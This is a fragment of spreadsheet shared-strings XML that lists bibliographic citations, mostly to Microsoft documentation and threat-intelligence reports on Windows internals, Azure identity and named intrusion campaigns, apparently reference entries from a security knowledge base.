    <t>Microsoft. (2020, December). Azure Sentinel Detections. Retrieved December 30, 2020.</t>
  </si>
  <si>
    <t>Microsfot. (2016, August 21). Cached and Stored Credentials Technical Overview. Retrieved February 21, 2020.</t>
  </si>
  <si>
    <t>MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 30, 2020.</t>
  </si>
  <si>
    <t>Microsoft 365 Defender Threat Intelligence Team. (2022, January 26). Evolved phishing: Device registration trick adds to phishers’ toolbox for victims without MFA. Retrieved March 4, 2022.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Microsoft identity platform and OAuth 2.0 authorization code flow. Retrieved September 12, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (2020, September 14). Update or repair the settings of a federated domain in Office 365, Azure, or Intune. Retrieved December 30, 2020.</t>
  </si>
  <si>
    <t>Microsoft 365 Defender Team. (2020, December 28). Using Microsoft 365 Defender to protect against Solorigate. Retrieved January 7, 2021.</t>
  </si>
  <si>
    <t>Miroshnikov, A. &amp; Hall, J. (2017, April 18). 4657(S): A registry value was modified. Retrieved August 9, 2018.</t>
  </si>
  <si>
    <t>Miroshnikov, A. &amp; Hall, J. (2017, April 18). 4697(S): A service was installed in the system. Retrieved August 7, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (2017, April 19). 4768(S, F): A Kerberos authentication ticket (TGT) was requested. Retrieved August 24, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2019, August 23). Active Directory Accounts. Retrieved March 13, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2019, February 14). Active Directory administrative tier model. Retrieved February 21, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2016, August 31). Active Directory Certificate Services Overview. Retrieved August 2, 2022.</t>
  </si>
  <si>
    <t>Foulds, I. et al. (2018, August 7). AD DS Getting Started. Retrieved September 23, 2021.</t>
  </si>
  <si>
    <t>Marlin, J. (2013, March 24). Alternate Data Streams in NTFS. Retrieved March 21, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (2017, December 12). ADV170021 - Microsoft Office Defense in Depth Update. Retrieved February 3, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (2019, April 19). Antimalware Scan Interface (AMSI). Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2015, June 9). Windows 10 to offer application developers new malware defenses. Retrieved February 12, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Asynchronous Procedure Calls. Retrieved December 8, 2017.</t>
  </si>
  <si>
    <t>Brower, N. &amp; D'Souza-Wiltshire, I. (2017, November 9). Enable Attack surface reduction. Retrieved February 3, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (2019, July 12). About BITS. Retrieved March 16, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2018, May 30). About Event Tracing. Retrieved June 7, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (2017, November 29). About Profiles. Retrieved June 14, 2019.</t>
  </si>
  <si>
    <t>M. Satran, M. Jacobs. (2018, May 30). Access Control Lists. Retrieved February 4, 2020.</t>
  </si>
  <si>
    <t>Microsoft Threat Intelligence Center. (2022, February 4). ACTINIUM targets Ukrainian organizations. Retrieved February 18, 2022.</t>
  </si>
  <si>
    <t>Microsoft. (2018, May 31). AddPrintProcessor function. Retrieved October 5, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). How to create and delete hidden or administrative shares on client computers. Retrieved November 20, 2014.</t>
  </si>
  <si>
    <t>Microsoft. (2018, May 31). AlwaysInstallElevated. Retrieved December 14, 2020.</t>
  </si>
  <si>
    <t>MSTIC. (2020, December 18). Analyzing Solorigate, the compromised DLL file that started a sophisticated cyberattack, and how Microsoft Defender helps protect customers . Retrieved January 5, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.</t>
  </si>
  <si>
    <t>Corio, C., &amp; Sayana, D. P.. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.</t>
  </si>
  <si>
    <t>Plett, C. et al.. (2017, October 15). assoc. Retrieved August 7, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). About Atom Tables. Retrieved December 8, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (2021, September 6). Audit logon events. Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2012, July 2). Audit Registry. Retrieved January 31, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Authenticode. Retrieved January 31, 2018.</t>
  </si>
  <si>
    <t>Baldwin, M., Flores, J., Kess, B.. (2018, June 17). Five steps to securing your identity infrastructure. Retrieved October 4, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (2019, November 11). Add or delete users using Azure Active Directory. Retrieved January 30, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2021, February 21). Azure Instance Metadata Service (Windows). Retrieved April 2, 2021.</t>
  </si>
  <si>
    <t>Amlekar, M., Brooks, C., Claman, L., et. al.. (2019, March 20). Azure Storage security guide. Retrieved October 4, 2019.</t>
  </si>
  <si>
    <t>Annamalai, N., Casey, C., Almeida, M., et. al.. (2019, June 18). What is Azure Virtual Network?. Retrieved October 6, 2019.</t>
  </si>
  <si>
    <t>Carr, N., Sellmer, S. (2021, June 14). Behind the scenes of business email compromise: Using cross-domain threat data to disrupt a large BEC campaign. Retrieved June 15, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Background Intelligent Transfer Service. Retrieved January 12, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). BITSAdmin Tool. Retrieved January 12, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Basic TxF Concepts. Retrieved December 20, 2017.</t>
  </si>
  <si>
    <t>Windows Defender Research. (2016, March 22). New feature in Office 2016 can block macros and help prevent infection. Retrieved April 11, 2018.</t>
  </si>
  <si>
    <t>Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August 30, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2017, June 19). Common Language Runtime Integration. Retrieved July 8, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Component Object Model (COM). Retrieved November 22, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). DCOM Security Enhancements in Windows XP Service Pack 2 and Windows Server 2003 Service Pack 1. Retrieved November 22, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (2013, February 4). Registry-Free Profiler Startup and Attach. Retrieved June 24, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2017, August 8). CVE-2017-8625 - Internet Explorer Security Feature Bypass Vulnerability. Retrieved October 3, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (2018, February 9). Windows Win32k Elevation of Privilege Vulnerability CVE-2021-1732. Retrieved June 1, 2022.</t>
  </si>
  <si>
    <t>Hudek, T. (2017, April 20). Catalog Files and Digital Signatures. Retrieved January 31, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Change which programs Windows 7 uses by default. Retrieved July 26, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Change the Normal template (Normal.dotm). Retrieved July 3, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Clear-EventLog. Retrieved July 2, 2018.</t>
  </si>
  <si>
    <t>Niv Goldenberg. (2018, December 12). Rule your inbox with Microsoft Cloud App Security. Retrieved June 7, 2021.</t>
  </si>
  <si>
    <t>Mathers, B. (2017, March 7). Command line process auditing. Retrieved April 21, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). The Component Object Model. Retrieved August 18, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (2013, July 31). Configuring Additional LSA Protection. Retrieved June 24, 2015.</t>
  </si>
  <si>
    <t>Microsoft. (2009, October 8). How Connection Manager Works. Retrieved April 11, 2018.</t>
  </si>
  <si>
    <t>Brower, N., Lich, B. (2017, April 19). Create a token object. Retrieved December 19, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014.</t>
  </si>
  <si>
    <t>Microsoft. (2018, December 5). CredEnumarateA function (wincred.h). Retrieved November 24, 2020.</t>
  </si>
  <si>
    <t>Lich, B., Tobin, J. (2017, April 5). How Windows Defender Credential Guard works. Retrieved November 27, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (2013, October 23). Credential Locker Overview. Retrieved November 24, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2016, August 31). Cached and Stored Credentials Technical Overview. Retrieved November 24, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved June 18, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (2017, April 20). HKLM\SYSTEM\CurrentControlSet\Services Registry Tree. Retrieved March 16, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2018, May 30). DACLs and ACEs. Retrieved August 19, 2018.</t>
  </si>
  <si>
    <t>Berk Veral. (2020, March 9). Real-life cybercrime stories from DART, the Microsoft Detection and Response Team. Retrieved May 27, 2022.</t>
  </si>
  <si>
    <t>Microsoft. (2017, November 8). Microsoft Security Advisory 4053440 - Securely opening Microsoft Office documents that contain Dynamic Data Exchange (DDE) fields. Retrieved November 21, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (2022, March 22). DEV-0537 criminal actor targeting organizations for data exfiltration and destruction. Retrieved March 23, 2022.</t>
  </si>
  <si>
    <t>Microsoft. (2010, August 12). More information about the DLL Preloading remote attack vector. Retrieved December 5, 2014.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Dynamic-Link Library Search Order. Retrieved November 30, 2014.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Dynamic-Link Library Security. Retrieved November 27, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (2017, December 1). MS-DRSR Directory Replication Service (DRS) Remote Protocol. Retrieved December 4, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (2017, June 1). Digital Signatures for Kernel Modules on Windows. Retrieved April 22, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2011, January 12). Distributed Transaction Coordinator. Retrieved February 25, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (2016, June 20). Reverse-engineering DUBNIUM’s Flash-targeting exploit. Retrieved March 31, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2016, July 14). Reverse engineering DUBNIUM – Stage 2 payload analysis . Retrieved March 31, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2016, June 9). Reverse-engineering DUBNIUM. Retrieved March 31, 2021.</t>
  </si>
  <si>
    <t>MSTIC, CDOC, 365 Defender Research Team. (2021, January 20). Deep dive into the Solorigate second-stage activation: From SUNBURST to TEARDROP and Raindrop . Retrieved January 22, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Deploying Active Directory Federation Services in Azure. Retrieved March 13, 2020.</t>
  </si>
  <si>
    <t>Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook Rules and Custom Forms Injections Attacks in Office 365. Retrieved February 4, 2019.</t>
  </si>
  <si>
    <t>Bani, M. (2018, February 23). Detecting Kerberoasting activity using Azure Security Center. Retrieved March 23, 2018.</t>
  </si>
  <si>
    <t>Shanbhag, M. (2010, March 24). Image File Execution Options (IFEO). Retrieved December 18, 2017.</t>
  </si>
  <si>
    <t>Microsoft . (2020, September 29). Microsoft Digital Defense Report FY20. Retrieved April 21, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Polling for Changes Using the DirSync Control. Retrieved March 30, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). How to disable the Autorun functionality in Windows. Retrieved April 20, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Enable or Disable DCOM. Retrieved November 22, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Enable or disable macros in Office files. Retrieved September 13, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (2012, November 29). Using security policies to restrict NTLM traffic. Retrieved December 4, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (2020, January 23). How to turn off Visual Basic for Applications when you deploy Office. Retrieved September 17, 2020.</t>
  </si>
  <si>
    <t>Windows Defender Research. (2018, March 7). Behavior monitoring combined with machine learning spoils a massive Dofoil coin mining campaign. Retrieved March 20, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (2020, October 15). Microsoft recommended driver block rules. Retrieved March 16, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November 30, 2017.</t>
  </si>
  <si>
    <t>Microsoft TechNet. (n.d.). Retrieved April 25, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (2018, May 31). Dynamic-Link Library Search Order. Retrieved November 30, 2014.</t>
  </si>
  <si>
    <t>Microsoft. (2018, May 31). Dynamic-Link Library Redirection. Retrieved March 13, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2018, May 30). Event Tracing. Retrieved September 6, 2018.</t>
  </si>
  <si>
    <t>Lich, B., Tobin, J., Hall, J. (2017, April 5). Manage Windows Defender Credential Guard. Retrieved November 27, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (2011, October 24). Environment Property. Retrieved July 27, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (2016, August 30). Esentutl. Retrieved September 3, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). EventLog.Clear Method (). Retrieved July 2, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (2020, February 7). Address lists in Exchange Server. Retrieved March 26, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2017, October 15). Expand. Retrieved February 19, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (2021, July 21). ftp. Retrieved February 25, 2022.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Specifying File Handlers for File Name Extensions. Retrieved November 13, 2014.</t>
  </si>
  <si>
    <t>Microsoft. (2018, May 31). File Management (Local File Systems). Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.</t>
  </si>
  <si>
    <t>Allievi, A.,Flori, E. (2018, March 01). FinFisher exposed: A researcher’s tale of defeating traps, tricks, and complex virtual machines. Retrieved July 9, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (2016, August 31). Forfiles. Retrieved January 22, 2018.</t>
  </si>
  <si>
    <t>MSTIC. (2019, December 12). GALLIUM: Targeting global telecom. Retrieved January 13, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2017, May 23). GFlags Overview. Retrieved December 18, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (2009, February 9). Disabling Bluetooth and Infrared Beaming. Retrieved July 26, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (2018, May 30). Filtering the Scope of a GPO. Retrieved March 13, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (2016, August 31). Group Policy Preferences. Retrieved March 9, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April 11, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Active Directory Cmdlets - Get-ADUser. Retrieved November 30, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Get-InboxRule. Retrieved June 10, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Domain.GetAllTrustRelationships Method. Retrieved February 14, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). IDL_DRSGetNCChanges (Opnum 3). Retrieved December 4, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). GetWindowLong function. Retrieved December 16, 2017.</t>
  </si>
  <si>
    <t>MSTIC. (2021, March 2). HAFNIUM targeting Exchange Servers with 0-day exploits. Retrieved March 3, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). HTML Help ActiveX Control Overview. Retrieved October 3, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). About the HTML Help Executable Program. Retrieved October 3, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (2018, May 30). Microsoft HTML Help 1.4. Retrieved October 3, 2018.</t>
  </si>
  <si>
    <t>Microsoft Secure Team. (2016, June 1). Hacking Team Breach: A Cyber Jurassic Park. Retrieved March 5, 2019.</t>
  </si>
  <si>
    <t>Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Internet Control Message Protocol (ICMP) Basics. Retrieved December 1, 2014.</t>
  </si>
  <si>
    <t>Microsoft. (2007, November 24). IIS Modules Overview. Retrieved June 17, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2017, June 16). Intercepting All Incoming IIS Requests. Retrieved June 3, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2017, June 16). ISAPI Extension Overview. Retrieved June 3, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2017, June 16). ISAPI Filter Overview. Retrieved June 3, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2016, September 26). ISAPI/CGI Restrictions &lt;isapiCgiRestriction&gt;. Retrieved June 3, 2021.</t>
  </si>
  <si>
    <t>Cai, S., Flores, J., de Guzman, C., et. al.. (2019, August 27). Microsoft identity platform access tokens. Retrieved October 4, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Retrieved September 12, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (2021, August 23). Create a managed image of a generalized VM in Azure. Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>M. (n.d.). Implementing Control Panel Items. Retrieved January 18, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Manage email messages by using rules. Retrieved June 11, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Installing and Registering a Password Filter DLL. Retrieved November 21, 2017.</t>
  </si>
  <si>
    <t>MSRC Team. (2021, February 18). Microsoft Internal Solorigate Investigation – Final Update. Retrieved May 14, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2011, July 19). Issues with BITS. Retrieved January 12, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (2007, August 15). The World of JScript, JavaScript, ECMAScript …. Retrieved June 23, 2020.</t>
  </si>
  <si>
    <t>Manuel, J. and Plantado, R.. (2015, August 9). Win32/Kasidet. Retrieved March 24, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated). Retrieved February 27, 2020.</t>
  </si>
  <si>
    <t>Sanyal, M.. (2014, March 18). Kerberos Pre-Authentication: Why It Should Not Be Disabled. Retrieved August 25, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2021, March 3). klist. Retrieved October 14, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2013, July 31). Configuring Additional LSA Protection. Retrieved February 13, 2015.</t>
  </si>
  <si>
    <t>Microsoft. (2014, March 12). Configuring Additional LSA Protection. Retrieved November 27, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (2009, May 17). Backdoor:Win32/Lamin.A. Retrieved September 6, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (2021, April 6). 2.5 ExtraData. Retrieved September 30, 2022.</t>
  </si>
  <si>
    <t>Microsoft. (2021, May 25). About List-View Controls. Retrieved January 4, 2022.</t>
  </si>
  <si>
    <t>Microsoft. (2018, December 5). LoadLibraryA function (libloaderapi.h). Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2018, December 9). Local Accounts. Retrieved February 11, 2019.</t>
  </si>
  <si>
    <t>Satran, M. (2018, May 30). Managed Object Format (MOF). Retrieved January 24, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2014, May 13). MS14-025: Vulnerability in Group Policy Preferences could allow elevation of privilege. Retrieved January 28, 2015.</t>
  </si>
  <si>
    <t>Microsoft. (2017, September 21). MSBuild inline tasks. Retrieved March 5, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2022, February 18). Manage device identities by using the Azure portal. Retrieved April 13, 2022.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Managing WebDAV Security (IIS 6.0). Retrieved December 21, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Manifests. Retrieved December 5, 2014.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Module Class. Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Get-MsolRole. Retrieved October 6, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (2016, December 14). Twin zero-day attacks: PROMETHIUM and NEODYMIUM target individuals in Europe. Retrieved November 27, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). What is .NET Framework?. Retrieved March 15, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2018, July 9). Network File System overview. Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>MSTIC. (2021, December 6). NICKEL targeting government organizations across Latin America and Europe. Retrieved March 18, 2022.</t>
  </si>
  <si>
    <t>Microsoft. (2017, December 1). MS-NRPC - Netlogon Remote Protocol. Retrieved December 6, 2017.</t>
  </si>
  <si>
    <t>Hughes, J. (2010, August 25). NTFS File Attributes. Retrieved March 21, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (2018, May 31). Named Pipes. Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2017, February 14). Net Commands On Windows Operating Systems. Retrieved March 19, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2006, October 18). Net.exe Utility. Retrieved September 22, 2015.</t>
  </si>
  <si>
    <t>Microsoft. (2012, September 11). Command-Line Reference - Netdom Trust. Retrieved November 30, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (2016, August 31). Network access: Do not allow storage of passwords and credentials for network authentication. Retrieved November 23, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). New-InboxRule. Retrieved June 7, 2021.</t>
  </si>
  <si>
    <t>Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM targeting delegated administrative privileges to facilitate broader attacks. Retrieved January 31, 2022.</t>
  </si>
  <si>
    <t>Ako-Adjei, K., Dickhaus, M., Baumgartner, P., Faigel, D., et. al.. (2019, October 8). About admin roles. Retrieved October 18, 2019.</t>
  </si>
  <si>
    <t>Microsoft 365 Defender Threat Intelligence Team. (2021, June 14). Microsoft delivers comprehensive solution to battle rise in consent phishing emails. Retrieved December 13, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (2014, July 9). Introducing the Office (2007) Open XML File Formats. Retrieved July 20, 2018.</t>
  </si>
  <si>
    <t>Florio, E.. (2017, May 4). Windows Defender ATP thwarts Operation WilySupply software supply chain cyberattack. Retrieved February 14, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and .ost). Retrieved February 19, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2021, October 6). PEB structure (winternl.h). Retrieved November 19, 2021.</t>
  </si>
  <si>
    <t>Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. Retrieved February 15, 2018.</t>
  </si>
  <si>
    <t>Kaplan, D, et al. (2017, June 7). PLATINUM continues to evolve, find ways to maintain invisibility. Retrieved February 19, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (2022, June 2). Exposing POLONIUM activity and infrastructure targeting Israeli organizations. Retrieved July 1, 2022.</t>
  </si>
  <si>
    <t>Babinec, K. (2014, April 28). Executing PowerShell scripts from C#. Retrieved April 22, 2019.</t>
  </si>
  <si>
    <t>Burt, T. (2019, March 27). New steps to protect customers from hacking. Retrieved May 27, 2020.</t>
  </si>
  <si>
    <t>Burt, T. (2020, October 28). Cyberattacks target international conference attendees. Retrieved March 8, 2021.</t>
  </si>
  <si>
    <t>McCormack, M. (2017, September 15). Backdoor:Win32/Poisonivy.E. Retrieved December 21, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2020, May 13). About History. Retrieved September 4, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2020, March 30). about_Logging_Windows. Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2012, July 18). Preauthentication. Retrieved August 24, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2020, March 10). Preventing SMB traffic from lateral connections and entering or leaving the network. Retrieved June 1, 2020.</t>
  </si>
  <si>
    <t>Schofield, M. &amp; Satran, M. (2018, May 30). Process Creation Flags. Retrieved June 4, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Taking a Snapshot and Viewing Processes. Retrieved December 12, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Setting Process-Wide Security Through the Registry. Retrieved November 21, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (2018, May 31). Processes and Threads. Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2021, September 27). about_Profiles. Retrieved February 4, 2022.</t>
  </si>
  <si>
    <t>Microsoft. (2017, March 30). Profiling Overview. Retrieved June 24, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2016, October 12). Protected Users Security Group. Retrieved May 29, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). What is Protected View?. Retrieved November 22, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved December 20, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (2021, September 24). How to remove entries from the Remote Desktop Connection Computer box. Retrieved June 15, 2022.</t>
  </si>
  <si>
    <t>Microsoft. (2012, April 17). Reg. Retrieved May 1, 2015.</t>
  </si>
  <si>
    <t>Russinovich, M. &amp; Sharkey, K. (2016, July 4). RegDelNull v1.11. Retrieved August 10, 2018.</t>
  </si>
  <si>
    <t>Russinovich, M. &amp; Sharkey, K. (2006, January 10). Reghide. Retrieved August 9, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Retrieved January 24, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (2018, May 31). Registry. Retrieved September 29, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2016, August 31). Registry (Global Object Access Auditing). Retrieved January 31, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (2015, August 14). How to use the Regsvr32 tool and troubleshoot Regsvr32 error messages. Retrieved June 22, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Enable the Remote Registry Service. Retrieved May 1, 2015.</t>
  </si>
  <si>
    <t>Microsoft. (2019, August 23). About Remote Desktop Services. Retrieved March 28, 2022.</t>
  </si>
  <si>
    <t>Margosis, A.. (2018, December 10). Remote Use of Local Accounts: LAPS Changes Everything. Retrieved March 13, 2020.</t>
  </si>
  <si>
    <t>Brower, N., Lich, B. (2017, April 19). Replace a process level token. Retrieved December 19, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). How to grant the "Replicating Directory Changes" permission for the Microsoft Metadirectory Services ADMA service account. Retrieved December 4, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>Microsoft. (2016, August 31). Runas. Retrieved October 1, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2006, October 30). How to use the SysKey utility to secure the Windows Security Accounts Manager database. Retrieved August 3, 2016.</t>
  </si>
  <si>
    <t>Microsoft. (2020, December 14). Configurable token lifetimes in Microsoft Identity Platform. Retrieved December 22, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). MS-SAMR Security Account Manager (SAM) Remote Protocol (Client-to-Server) - Transport. Retrieved December 4, 2017.</t>
  </si>
  <si>
    <t>Russinovich, M. (2016, July 4). SDelete v2.0. Retrieved February 8, 2018.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Security Identifiers. Retrieved November 30, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Configuring SID Filter Quarantining on External Trusts. Retrieved November 30, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Active Directory Schema - SID-History attribute. Retrieved November 30, 2017.</t>
  </si>
  <si>
    <t>Anthe, C. et al. (2015, October 19). Microsoft Security Intelligence Report Volume 19. Retrieved December 23, 2015.</t>
  </si>
  <si>
    <t>Anthe, C. et al. (2016, December 14). Microsoft Security Intelligence Report Volume 21. Retrieved November 27, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (2008, September 10). Using SMB Packet Signing. Retrieved February 7, 2019.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Service Principal Names. Retrieved March 22, 2018.</t>
  </si>
  <si>
    <t>MSRC Team. (2019, August 5). Corporate IoT – a path to intrusion. Retrieved August 16, 2019.</t>
  </si>
  <si>
    <t>Microsoft Threat Intelligence Center (MSTIC). (2020, September 10). STRONTIUM: Detecting new patterns in credential harvesting. Retrieved September 11, 2020.</t>
  </si>
  <si>
    <t>Microsoft. (n.d.). Start your PC in safe mode in Windows 10. Retrieved June 23, 2021.</t>
  </si>
  <si>
    <t>Microsoft. (2017, May 28). Audit Other Object Access Events. Retrieved June 27, 2019.</t>
  </si>
  <si>
    <t>Plett, C., Poggemeyer, L. (12, October 26). Securing Privileged Access Reference Material. Retrieved April 25, 2017.</t>
  </si>
  <si>
    <t>Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved March 13, 2020.</t>
  </si>
  <si>
